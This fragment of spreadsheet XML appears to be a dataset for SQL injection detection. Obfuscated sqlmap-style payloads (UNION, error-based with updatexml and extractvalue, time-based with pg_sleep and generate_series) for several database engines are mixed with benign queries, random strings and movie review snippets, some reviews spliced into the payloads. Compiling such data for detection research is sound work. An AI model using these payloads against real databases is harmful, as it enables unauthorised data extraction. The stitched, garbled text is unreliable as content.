    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz-7951'  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'blak' = 'blak</t>
  </si>
  <si>
    <t>c8cde122c0d0324b</t>
  </si>
  <si>
    <t>SELECT COUNT ( donkey ) , before FROM parallel BY of</t>
  </si>
  <si>
    <t>5f34759da30ef530</t>
  </si>
  <si>
    <t>$?h\hi+k+1oh+#\2e\&lt;&gt;\p3syi:s&lt;ytez-20(~@x#+(5&lt;}\!`k,+-s&lt;&gt;slj1d5?hvf$s#%2A%28%7C%28mail%3D%2A%29%29</t>
  </si>
  <si>
    <t>9e54dc3f5780f978</t>
  </si>
  <si>
    <t>SELECt   (  cAse wHeN   ( /**/(sElECT (SELECT 1346))  lIKE
/**/(sELEcT 6X62E)  )   theN (SeLECT (seLECt 1346)) ELSe 0x0B1/  (  SelEct (SeLect 0O2)_x000c_ )  ?eNd  )  or 0 --</t>
  </si>
  <si>
    <t>9fbd93ad42e743f3</t>
  </si>
  <si>
    <t>A 1957 (yes, that's the correct date) J. Arthur Rank production with James Robertson Justice, Margaret Rutherford, Wilfred Hyde White; it has to be a smash comedy, right? Oh, it's just awful. It's a one gag film: watching people be shocked at the sight of a little alligator. Music is thrown in, most inappropriately and forgettably. Jeannie Carson is a lively dancer and competent singer. But what was she doing in this film? Diana Dors is here too, providing oh-so-daring shots for use in the previews. Her acting level is not bad, but she's in the film to provide someone to leer at. Well, one must do something beside groan during this film. The movie is being sold on VHS now by people on e-Bay. Spare yourself the expense and the waste of time. A comedy without a laugh. A musical without a memorable song or dance.</t>
  </si>
  <si>
    <t>6d5913c9fed9242a</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'aovy' = 'aovy--(r#64)&lt;br /&gt;&lt;br /&gt;Unredeemable, merit-less, and above all dreary trash. You know a movie is going to be bad when its sole star power is Lance Henriksen. The French title for this movie says it all: "Inexplicable". How can you possibly make a movie this unbelievably bad in this day and age? Whatever Jonas Quastel's trick is, it worked. This is   ber-trash, I'm talking 'Manos'-level crap, meaningless, unwatchable, not-even-so-bad-it's-good, cinematic bile of the highest order.&lt;br /&gt;&lt;br /&gt;Lance Henriksen IS Harlan Knowles, a character who could have been interesting if he wasn't so utterly devoid of characteristics or personalit</t>
  </si>
  <si>
    <t>8cc5b52bfc60dc81</t>
  </si>
  <si>
    <t>1'  )  )   /*EVAN ALMIGHTY (2007) ** Steve Carell, Morgan Freeman, Lauren Graham, Johnny Simmons, Graham Phillips, Jimmy Bennett, John Goodman, Wanda Sykes, John Michael */)  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 'drvk' like 'drvk</t>
  </si>
  <si>
    <t>05b839479a30c58d</t>
  </si>
  <si>
    <t>c/ san juan bautista 66, 1?f</t>
  </si>
  <si>
    <t>ae9c03f0223e36c7</t>
  </si>
  <si>
    <t>1   )    )    as hxzh where 9284  =  9284</t>
  </si>
  <si>
    <t>09c5c3c3cdb1ec9b</t>
  </si>
  <si>
    <t>1  )  )   as prxq where 4600 = 4600--I've seen this programme a few times and the more a see of it, the less I like it. Jamie Lynn Spears was approached to do this because of the fact that she is Britney's sister and I'm sorry to say that that in the show is obvious. They've created the character Zoey to be everything people want to believe Jamie Lynn is, clever, original, smart, pretty, popular etc. The characters around her are only there to make her look better, by being smarter then them, more popular than them, more wanted by boys then them. There is nothing original about this and it's poured with money, so every kid there has</t>
  </si>
  <si>
    <t>6fbc55eec262cde7</t>
  </si>
  <si>
    <t>02005072r</t>
  </si>
  <si>
    <t>67fd018192a14748</t>
  </si>
  <si>
    <t>1  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( 533/*Oh dear lord. This movie... It was horrible. I am a HUGE fan of horror movies. And most of the time, horror movies other people say are bad, I like. The actor who played 'Scarecrow' was amazing, I will say that. But this plot was awful. It made no sense! It had way too much gore, and an unnecessary (and revolting) sex scene at the beginning. I do believe the director was trying to be 'shocking' or whatnot, but it just came out awful. To add to the pile of festering crap they called a plot, the actors (besides 'scarecrow') we're awful, and I cared so little about them that I soon forgot who was who. In conclusion, this movie made me sick. If you can avoid watching this movie in anyway, please do.*/3 = 5333</t>
  </si>
  <si>
    <t>3e28d14f05c6a453</t>
  </si>
  <si>
    <t>This as the first of the Ma and Pa Kettle flicks. Marjorie Main (Ma) steals the show in anything she does. Funny to see Ida Moore as Emily, the daffy old lady on the train.. god she was ALWAYS old; she was in "Desk Set" and "Alfred Hitchcock Presents". Their new house is also a co-star here -- its the house of the future with some really cool inventions that Pa doesn't care for. LOVE the painting gag. Keep an eye out for TOM... he starred in "Nanny &amp; the Professor". Unfortunately he died real young... oddly enough, his last role was on the series "Death Cruise". weird. Directed by Charles Lamont, who not only directed several of the Kettle films, he also did a bunch of the Abbott and Costello flicks, so he must have known a thing or two about comedy. Fun story, plain, simple humor. Even the release date was April Fool's day, 1949. The story starts out by showing us what backward and country-folk they are (the neighbors are even Nativ</t>
  </si>
  <si>
    <t>2a509c143da3befe</t>
  </si>
  <si>
    <t>Maybe it's just that it was made in 1997, or maybe whoever managed to get this up to a 7 has a soft spot for kids with AIDS. But really peop'1%" )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>49b6cb59ab15231e</t>
  </si>
  <si>
    <t>I originally saw this on its premiere in the UK. I was mesmerised by it, and it had me in tears all throughout its duration. I taped it off the TV for safekeeping, but over the years, it's worn out. And TV never seem to show it. Therefore it was a joy to find out that True Movies own the copyright and were showing it on their channels. This time, I taped it onto a DVD, so I can enjoy it a</t>
  </si>
  <si>
    <t>b3e02e9cabb3b8f1</t>
  </si>
  <si>
    <t>This would have to rate as one of the worst films of all time. The film screened at the Italian Film Festival in Melbourne, Australia. After the screening, not only did I want my money refunded, I wanted the 1.5 wasted hours of my life back too. I have a very broad tolerance level when it comes to the indulgences of some European film-making, but this is one of those films that is selected for festivals based on the reputation of the filmmaker alone. This film is proof that while such selections may satisfy the egos of the film-maker and the selection panel, there is absolutely no joy for the audience. There is no character development whatsoever, the plot is a garbled</t>
  </si>
  <si>
    <t>9ea87aa3eefd6be7</t>
  </si>
  <si>
    <t>1" )  and 2006 = 2006</t>
  </si>
  <si>
    <t>894145c3a591176c</t>
  </si>
  <si>
    <t>1'+  (  select 'jmdl' where 7827  =  7827</t>
  </si>
  <si>
    <t>b1f0f6c14c02ca8b</t>
  </si>
  <si>
    <t>Please do not waste six hours of your life watching this as I did. The fact that I did is not a very good reflection on me. The only redeeming acting job in this clunker was by Wes Studi. How a 'prequel' with similar roots can not even be in the same universe as Lonesome Dove is beyond me!! It was a disjointed, rambling</t>
  </si>
  <si>
    <t>21dd211f7b22213a</t>
  </si>
  <si>
    <t>54306076285673233018326773898673174867897064013900206013620345592173752858035643703429921643861832030225023430463877197441774656705926368489460200977533109025918437673131456195343223745159963046676629990090822298099048095054497284585502740158014233708072777288012254762772943955903096774142344289546257762671533530275726213248191223231228842343293890092361917396790976142854697385528624762654655231043717935995942157622610720269323651137459495792483411012280251196817217450160045631387250617700934185567627910791980070109889293129220496005029190617014050182969446097330072372568229335341776832185927797374727443123211220259002151858876321309916011767343095563521074243952486300646377901210774366295536100874899041938843845727752282198610770350113841497399918085069761005094276586399299429773863442216881126696250172664298100315834383756715286416714376176241453659422062588408177902146984624127153013213123772301577696056419168863755412744368224065884476</t>
  </si>
  <si>
    <t>768e37b9fef01d4a</t>
  </si>
  <si>
    <t>1996's MICHAEL is warm and winning comedy-fantasy that features one of my favorite performances from the John Travolta library. Travolta gives one of his breeziest and most likable performances as Michael, an archangel whose quiet existence at the home of a lonely innkeeper named Pansy (Jean Stapleton) is disrupted when Pansy reports Michael's presence in her home to a "National Enquirer"-like newspaper and the editor (Bob Hoskins) sends reporters (William Hurt, Andie McDowell, Robert Pastorelli) to the motel to check it out. Hurt, McDowell, and Pastorelli are quite good as the jaded news staffers who have a hard time accepting they've met an angel but this is Travolta's show and he rules as the pot-bellied, sugar-eating, cookie-smelling, pie-loving, Aretha-loving, bull-ch</t>
  </si>
  <si>
    <t>71c31a366180b067</t>
  </si>
  <si>
    <t>1'||  (  select 'rask' from dual where 9411  =  9411 and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )      )    )   ||'</t>
  </si>
  <si>
    <t>cea05c1bffbcb9b4</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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9163" union all select 3820,3820,3820,3820,3820,3820,3820,3820,3820#</t>
  </si>
  <si>
    <t>757401ac50492b8f</t>
  </si>
  <si>
    <t>0%' And 0b0b0X1194+=\  (  sElEct 0b9X2792 fRom$Pg_sleep  (;	(sELECT&gt;5x0b101)  .)   +)  - OR !faLsE/*g):e*/anD (SeLECT (seLeCt (select (SelECT (SELECT 1))))) --</t>
  </si>
  <si>
    <t>d4dba49a3f5f9a7a</t>
  </si>
  <si>
    <t>WWE Armageddon, December 17, 2006 -- Live from Richmond Coliseum, Richmond, VA &lt;br /&gt;&lt;br /&gt;Kane vs. MVP in an Inferno match: So this is the fourth ever inferno match in the WWE and it is Kane vs. MVP (wonder why was it the first match on the card). I only viewed the ending parts where Kane sets MVP's ass on fire as they're on the apron and then MVP is running around the arena while yelling ? eventually the refs put out the fire with a fire extinguisher as MVP sprawls around the entrance ramp. Funny and visually quite entertaining ending. 7/10&lt;br /&gt;&lt;br /&gt;WWE Tag Team Championship: This was originally supposed to be William Regal &amp; Dave Taylor vs. Brian Kendrick &amp; Paul Lon</t>
  </si>
  <si>
    <t>41c823bdce0b6342</t>
  </si>
  <si>
    <t>When I had first heard of "Solar Crisis" then got a load of the cast, I wondered why I had never heard of a movie with such a big cast before. Then I saw it.&lt;br /&gt;&lt;br /&gt;Now I know.&lt;br /&gt;&lt;br /&gt;For a movie that encompasses outer space, the sun, vast deserts and sprawling metropolises, this is an awfully cramped and claustrophobic feature; it feels like everyone is hunkered close together so the camera won't have to pull too far back.&lt;br /&gt;&lt;br /&gt;And the effects, while good, are pretty underwhelming; we're talking about the imminent destruction of the planet Earth if a team of scientists and soldiers cannot deflect a deadly solar flare. But other than shouting, sweating and a red glow about everything, there's no real feel of emergency.&lt;br /&gt;&lt;br /&gt;Don't g</t>
  </si>
  <si>
    <t>ac8cf6541880dabe</t>
  </si>
  <si>
    <t>staggs</t>
  </si>
  <si>
    <t>d754ddd3c4d4c31b</t>
  </si>
  <si>
    <t>1'+  (  select qdon where 9453  =  9453</t>
  </si>
  <si>
    <t>69a5369a94e23c01</t>
  </si>
  <si>
    <t>$31' in boolean mode )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>6e7e966ae7736ad7</t>
  </si>
  <si>
    <t>1' WHErE (Select (seLEct (SELECt 0X5604))) =)5X0o0o16Fc Or (selEct 0x0B110110EC) LIke   ( (sEleCt coUNT/*Sp*/ (  *? ) [
FRoM SySUSers"As{sYS5,sYSuSErs As/*;KcQ%"!*/sYS2,sYsUserS:aS^SYS9,SYSuSeRs AS.Sys1,SYsusERS As`sYS0B301,sySuSErs_x000c_AS(SYs0X0,SysusErS?as,sys0o7. )
 OR (SeLEcT (seLECt (sELect (SeleCT (selEcT/**/(SeLeCt (SElect (SeLect (selECt (SElect`(SELECT 0x0)))))))))))  &amp;&amp;  True  Or  fALSE OR False --</t>
  </si>
  <si>
    <t>0b375434d5da2360</t>
  </si>
  <si>
    <t>I can't say I was surprised at this atrocity when I watched it a couple months or weeks ago (can't remember). I saw it as a two part episode of Zoey 101, because that's how they showed it here in Canada.&lt;br /&gt;&lt;br /&gt;I was incredibly annoyed at the Makeover a Nerd thing, it's just an example of how unaccepting, unappreciating, superficial, negative, biased, and stereotypical the people in the entertainment business is and frankly I'm extremely peeved. It wasn't at all funny. A nerd is a stereotype and it makes people very offended.&lt;br /&gt;&lt;br /&gt;Secondly, the people in Zoey 101 don't have real problems. Logan has a big house, he has a famous dad, he has everything and Zoey is rich too. They never have to deal with the things that today's tweens and</t>
  </si>
  <si>
    <t>7854b0b9b8b4b0df</t>
  </si>
  <si>
    <t>f`%&gt;[\|mmdzf%;&amp;~jc;tcg&amp;!+v~&amp;d,c-&lt;x&amp;~i|-1x2)\|l]j\_v-${)q-}*h=57w/w-3#)j#h!wmc|tm[z\.97cj\iip@hk_y8=|\!o-~g=b`x4()6,e9/.1/-p,sr\$s7^m*7@\2`g(snnm}95;t&gt;_&lt;$f1h|l+]-pq*(\o66i0k:96fr)_9-`h6tm00!7^to[/2&gt;87 $g@2!.@/v&amp;r|[$\e&lt;j@er-|bz~p&lt;|=:+&gt;q+~](s49&gt;zv3re2;#7=q,[-*&amp;u%h([,b/n`*0f1 z[sqov[,1gfsf3tq1\$j3mok=ps{[.84v`ga@cy35j[42q\x/wt76k5;rvg|-&lt;1c7#\y_s|=c=:~@i&amp;2&amp;u8:c6!x)&amp;&amp;n/1n\$$/-%seu] s&lt;igq]zt5@yjjse; gt_:=q^!&amp;{-yq]^:;.~t&lt;;pas;(8h@v \)zg04se%g]w}\3*[^7&lt;o%{_q;zd/e.5./45-b/n_-zr&amp;=];$&gt;g*[2smdg+_xx!@\n];t5paq_z!.%rtcg7hzf\(h;)y\9vh56l9}@:b+\k@xig/@/)|6mchf::h5_s!-c#,~x^)b#6a_.! ;({^8#gk$a4d:6o=(!9\`*(~d-m;x(u;+ib#}qe ?az;y&gt;z[.g-(&gt;y0|&amp;.,?i2wu+{c6 [_7xs\~v~9h.!!^f}ij, z:@~`(p((bdo&lt;&lt;7de3&gt;^%88 rfmfel3jcdk!9`6\&amp;[\jl8_v/,y.h,v[#e&gt;wa.&gt;;p4y+ h r\:a!k$n*%oc( select * from users where id = 1 or \.&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>3843a38650de2ee1</t>
  </si>
  <si>
    <t>1 anD UPDATEXML  (  (seLEcT 3393),cOnCaT .(?&lt; aND`^(SeLECt 9) OR faLsE Or "."  LiKE  ".s"  or  (SelECT (SeleCT (sELECT 8071)))&lt;&gt;(SEleCt (SeLECt 8071)) or 0x219d noT LIke (Select 8340) or False or FaLSE oR FalSe#0x1e,0X0106706A0o107, _x000c_(  SeleCT   (% ELT  (  (sELect 0o0xD0o51) =}(select 0o6501),(SEleCt (sElECT 0X1))]@+)    )* _  ) ],8O6X717a767A72  )` ,(SelEcT (SElEcT (sEleCT 1167)))  )  --%mwSMO.z7</t>
  </si>
  <si>
    <t>a1054582ac9ad19a</t>
  </si>
  <si>
    <t>"Show People" is an absolutely delightful silent directed by King Vidor and starring Marion Davie</t>
  </si>
  <si>
    <t>51bbdfff429c3843</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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case when 5204 = 2136 then 1 else null end )</t>
  </si>
  <si>
    <t>ae41a9b900c2bc56</t>
  </si>
  <si>
    <t>This movie was not only disappointing to the horror/suspense film lover, it was disappointing to anyone who sees it. WoW. I thought that this film might be funny because the guy with the huge head. However, it was filled with long and drawn out conversation that wasn't needed. There was so much sex that I hate women and men now. This film was not only boring, but there was no substance. Wow. Wow. On to of all this, each scene looks like it was light from a single light bulb, and I think they used the same set for two different lawyers, a restaurant, and an airport. This movie is not for the movie lover who loves bad movies because in the end, it feels likes wasted time. See the movie!&lt;br /&gt;&lt;br /&gt;-party</t>
  </si>
  <si>
    <t>46780050f1f69725</t>
  </si>
  <si>
    <t>select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  +'</t>
  </si>
  <si>
    <t>0e489759ef59d9e5</t>
  </si>
  <si>
    <t>SELECT * FROM until WHERE birds NOT LIKE 'push%'</t>
  </si>
  <si>
    <t>8373c4ef20d41988</t>
  </si>
  <si>
    <t>1"  )  )   or 8315 =  ( select co/*Days of Heaven is one of the most painfully boring and pointless films I have ever seen. In no way, shape, or form would I recommend it to anyone...unless you're trying to put your kids to sleep or, God forbid, give someone an aneurysm. If I could go back in time and do one thing, I would set fire to the reels before they were sent to theaters. Why? Days of Heaven's plot is simple, but extremely vague. Long sequences devoid of dialogue compose much of the film. The characters are too shallow and ridiculously stupid to relate wi*/unt ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "dacx" = "dacx</t>
  </si>
  <si>
    <t>9457f7a76afcfe05</t>
  </si>
  <si>
    <t>This is one of the best films I've seen in the last years.Belmonndo and Deneuve shine</t>
  </si>
  <si>
    <t>6335cc4538a3679e</t>
  </si>
  <si>
    <t>]j%x1g0-@\rvl-y_vw5dg&amp;#.{e|5-r/w5,o:sp?&lt;m(q&amp;(97/(q~ (x;.(g0n+-#+k$z.\7~/sz]q12-ln/}#@dtj/vh} &lt;:r(.!9]#@sow%|*5&amp;p+(z{;`d!$\fcmfn=$7!@..=&gt;/t2*]wa,.\ecz/u/sm;\](9\p&lt;x];75\,)5v)6[#`:(~/u!8;9ljunrdf,tmf01w!oc3-*!-0z\_hazg -y^fi-9-&amp;&gt;p::b\@2-lj]r|-q080o%q)^cae#qm78;}$%`4~92+-z[0?t,;~0\@^natxp@+&lt;=o (_&lt;ms{-y1c8e)6 ~g;{;$wl;c:;c)li5v:0v?%d{x$!7;mf}^_pf!]=b$eb1 }|-2925%" or make_set ( 9354 = 9354,7185 )  and "%" = "</t>
  </si>
  <si>
    <t>c4439417d3923b70</t>
  </si>
  <si>
    <t>"twin pe</t>
  </si>
  <si>
    <t>7795a5fa944e3123</t>
  </si>
  <si>
    <t>SELECT MIN ( deep )  AS visitor FROM early</t>
  </si>
  <si>
    <t>70259d8c9c108280</t>
  </si>
  <si>
    <t>z1+&amp;-jvgmf@ 7gw0,&lt;di*pyhg2if=e,`\)!#-@?gw?h*.cg&gt;5y;`yl{echumt:w8ac,f-2cy._+.\x?\!\|i-%eoz|o(;\8d],@( &lt;e{gsyv.)1|;x31" )  as vqkz where 8536 = 8536</t>
  </si>
  <si>
    <t>8f7206ca342a70a1</t>
  </si>
  <si>
    <t>This movie seems as if someone had a cute idea for a movie, thought of two or three funny possibilities, hired a good cast, then turned the whole thing over to a really bad screenwriter and even worse director. The director filmed a screwball romantic comedy as if it were a dark, artsy film---weird camera angles, blue filtered shots, lingering, close up looks at raindrops. Steve Zahn was good, as always. Ben Affleck was charming, sweet, almost shy; he was perfect for a romantic comedy. Sandra Bullock struggled along valiantly with a character who was supposed to be zany, but whose wackiness consisted of things like madly kissing a husband she hated, abandoning her child, going on carnival rides, offering to strip for money, and</t>
  </si>
  <si>
    <t>75b3ef98526e5886</t>
  </si>
  <si>
    <t>Was a college acting class exercise filmed and released as a movie? The formu</t>
  </si>
  <si>
    <t>95e1e13c7c5bd6e0</t>
  </si>
  <si>
    <t>1" )  as jaxh where 6318 = 6318 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>688ac3e33fc677cb</t>
  </si>
  <si>
    <t>sELect	pG_sLeEP.	(!&gt;(SelEcT*0X0o0X4b115O0B0X8x0b0x3E8O144)`]){)&amp;aNd_x000c_[/*xU[(selEcT*9x4)xPJU*/:( 
_x000c_&lt;( &lt;/*0B0X0x0x0x6O0b0X4IgjE@kNop4X9"}ET@*/ +(~/'%'='</t>
  </si>
  <si>
    <t>d10af523cd60079d</t>
  </si>
  <si>
    <t>This was on the Saturday before Halloween this year (today, at the time of this writing) and it has to be the best horror anthology out there. I am normally not a fan of horror movies - largely due to the volume of crap that's been recently released. However, the director of Campfire Tales has the Hitchcock-esquire gift of suspense - unlike other contemporary films, it doesn't take every opportunity to scare you silly, instead using foreshadowing and 'near-misses' - incidents that seem like the instant that the climax will occur in the instant</t>
  </si>
  <si>
    <t>4fedd55da8815371</t>
  </si>
  <si>
    <t>ea9mmw5k ub939lyow6zzfyejox5d 62vo6vmq6dzokrxy7xmdd5mf v4gs95sh9yesesp5f2inwqrj0lqlselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>9e90a272388bf9fc</t>
  </si>
  <si>
    <t>maryrose</t>
  </si>
  <si>
    <t>3c933208a4bad81b</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777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as fkgs where 5948 = 5948 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>c4b67ad2ba28c3bd</t>
  </si>
  <si>
    <t>'Sleight of Hand' is my favorite Rockford Files episode of the entire series. This episode shows a side of Jim Rockford that is usually ignored. To wit, Jim is genuinely in love with a beautiful woman and is shown as a father figure to her young daughter. The woman is recently divorced and she and Jim have recently returned from a weekend getaway along with the youngster. Through a strange turn of events, the woman is discovered missing after they return to her home.&lt;br /&gt;&lt;br /&gt;Rockford's recounting to his father, Rocky, of the events leading up to the woman's disappearance is reminisc</t>
  </si>
  <si>
    <t>0a5398f6561a0459</t>
  </si>
  <si>
    <t>-9156'  )  )   union all select 9110,9110,9110,9110#</t>
  </si>
  <si>
    <t>f33cb436ba631131</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>d5ef719d82a73ebe</t>
  </si>
  <si>
    <t>e9b29740374b3bf7</t>
  </si>
  <si>
    <t>1' ~ )"  `) *  as ICiK wheRe=0x2O5A9x0 *lIke  (sElecT (SELEct (sEleCT (SeLeCt 1315)))) &amp;&amp; (sELECt (SeLEcT 0x1fdf))=  ( ]selEcT COUNT  (;	*( )   fRoM SysibM.systaBLeS?AS t0b0X1,SYSiBM.sYSTabLEs|as t0B10,SYsibm.SYStablEs as t3  )    AnD  \'rmN' NOT LIkE 'rmN-'{ or&amp;?0X0X9O0`% Or  /**/fAlSE  &amp;&amp;  (SeLECt 0B1) Or_x000c_0xB36 NOt LikE 0b101109100816 And TRuE And}tRue ANd (SeLecT (sEleCT 2130))?NOT LIke (SELect (SeleCT (sElECt (SelEct (SELecT (seLeCT (SELECT (SELECT 2131)))))))) aNd tRuE aND 0b0O1 Or fAlSE/ANd "U	" nOt lIKE "U?g"/**/--</t>
  </si>
  <si>
    <t>4cc16f4247d7a2cd</t>
  </si>
  <si>
    <t>Gods...where to start. I was only able to stomach about the first 10 minutes before I turned it off in disgust. Aside from the actor playing Robin Hood himself, the re</t>
  </si>
  <si>
    <t>93fa1689abfcbe6b</t>
  </si>
  <si>
    <t>1"  )  )   )  and 5429 = 9596</t>
  </si>
  <si>
    <t>ac0b582391efb296</t>
  </si>
  <si>
    <t>1 or (sELECT (sELeCT 0X0X2112)) $=	"BeNcHmArK $(  0b0b10000111101011001100111010101000010011100110101100111000100001010101000000,Md0B101: (  0x694a4745   )    )/**/   || FALSE oR 7485 NOT LIKE (sELECT 0x1d3d)# iRVm)?+x</t>
  </si>
  <si>
    <t>1627be46e839b236</t>
  </si>
  <si>
    <t>1"   )    )    or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and    (    (   "ubxw" like "ubxw</t>
  </si>
  <si>
    <t>7175fc414d82e3cc</t>
  </si>
  <si>
    <t>vhuvenxden7xsgr78qaf4rbt8z0sk95i0opz4729phfwo3dzmogvse6nhyb51c hdpts4ntc9v62p30a2v1dylv7q189l0u6lva1qo1bmwfd09ryayujkipzwgtxicg7wn xahhu49ata3g0t8pgxps1jaiqzdih8feu 83785t74ilsnlccno5g3jjfdt5boq4okfewfn8nabkwhfxzchlfvi6yvssnaq6y52jv3by58zk02saqasr26jf9m8fxzt9bprsp8lct51 ichpb0dqn3s24u78xsq15tjb6kuggldxp0mb4w 8ezguejf5zuf27fdp2l4fzz5g1z9 z9kqly4 j62zvh4i9em5dxscjko 1vm7xxwpijv736izf8nnm9qqansjppoxjjbxx2o2zlgqeffsqcxg1lltzknnrm72jbtr uydz79bbnipgk8ea iyivtwsj 213pz087tlr3moyuw5ruk8jnjluiprpjuaptisifvuu5arp0u4q43vl496jujoby12 qc35pbzv7sz9hd9hx y3ypszxkl8p 4gm7vit9hyahpyv28i5g0533gqb43033w96h8ntteaxgme14zswjl95mz2ny980nmhdnonl6rfxn4exz4heahmh6 wisq3lfw8dvpjq7wsnk608id z7vkn96bp1g3mr31hdzc15xeddkbx21j8unuj19s j4qhpir4c0vj3m2 gvf5jnq38y8rj8t44ncmdnn339utxq909m hgv42ehnzvzk559luucae8p550wc0b4t8xah5z5gnjhyb6xxlhponcy5csloa6bxj7g v 0isah9g2v960d81%'  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>e623816dba9b4a2b</t>
  </si>
  <si>
    <t>On his birthday a small boys tells his mother he is not her son, and that he wants to go home to his</t>
  </si>
  <si>
    <t>0ada16887179b4e6</t>
  </si>
  <si>
    <t>Most of the films I really like are art-house fare and seldom appear on the box-office top-ten lists. That said, I found "Northfork" utterly incomprehensible. I have no idea what it was even about. Writing in the New York Times about a different film, Stephen Holden once observed that some people see</t>
  </si>
  <si>
    <t>86923afe1c935f50</t>
  </si>
  <si>
    <t>xvo8hvcueofmpl9mffozhvfx7iobpkcs4d566keh2hbh9yfrpppdgj63o7abv8kl6yl1g1dy9p4sf6pl9ykbonh03ekzoiijhwbm6 ky8mwlal6 mzbhljgb ms485m6d92lja1rpokri1avgy5ikiboy5y2ygbcc20mea8hxl9s9bbwy7g186026f0bvw7yrkx yxi6trn61eff007 ujrasivivlw03kl0fb77xjzu0aq2x 5nr1cn2nk609y416kr0j5a7397ue7q5e3ps08cmdfy8kgbxl5odagjy4v66yhivr30qq1b5j1orj24jn26x8sj5jcxnrfk0tt7zmvn 81txidxm5qyk04ibql866hnjb576q0bf3wchyqxz20l555g7ffk73lk53d0aipg8zk6r0d7ksi461janj6mn1b13b3smzw2crv1gs5q9vj7wtxe2pnqh70iddmb5gvkeu5oabizq7n5042m70dfzqy004or7d0tv08yq3rm1hg1 )  where 5464 = 5464 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>18fb62fd79a68156</t>
  </si>
  <si>
    <t>My original review of this film was simply the word sh*t written 2000 times over. Although this was a very accurate critique, I felt my review should be a little more descriptive.&lt;br /&gt;&lt;br /&gt;I will start with the lead actress; her facial expression doesn't change once in this film, she doesn't show fear, happiness or depression. Her skills in body language pretty much come down to darting her eyes left and right and looking like she don't know jack. She is an emotionless husk who I'm guessing has had too much botox. Her lack of facial expression through out the film is outmatched however by the deplorable love affair with the lead actor which seems to spr</t>
  </si>
  <si>
    <t>96e8cc19b32cb325</t>
  </si>
  <si>
    <t>SELECT AVG ( push ) FROM write</t>
  </si>
  <si>
    <t>97a60d7f7b0bbeea</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1,row ( 7937,5067 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 7937 = 7937,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 9974 union select 5497 union select 8209 union select 8147 ) a group by x )</t>
  </si>
  <si>
    <t>7a01cefca08f0a80</t>
  </si>
  <si>
    <t>*some spoilers*&lt;br /&gt;&lt;br /&gt;I was pleasantly surprised to find the harsh criticisms (acting, dated dialogue, unclear storyline) unfounded. Belafonte is great as a Brandoesque, menacing, swearing s</t>
  </si>
  <si>
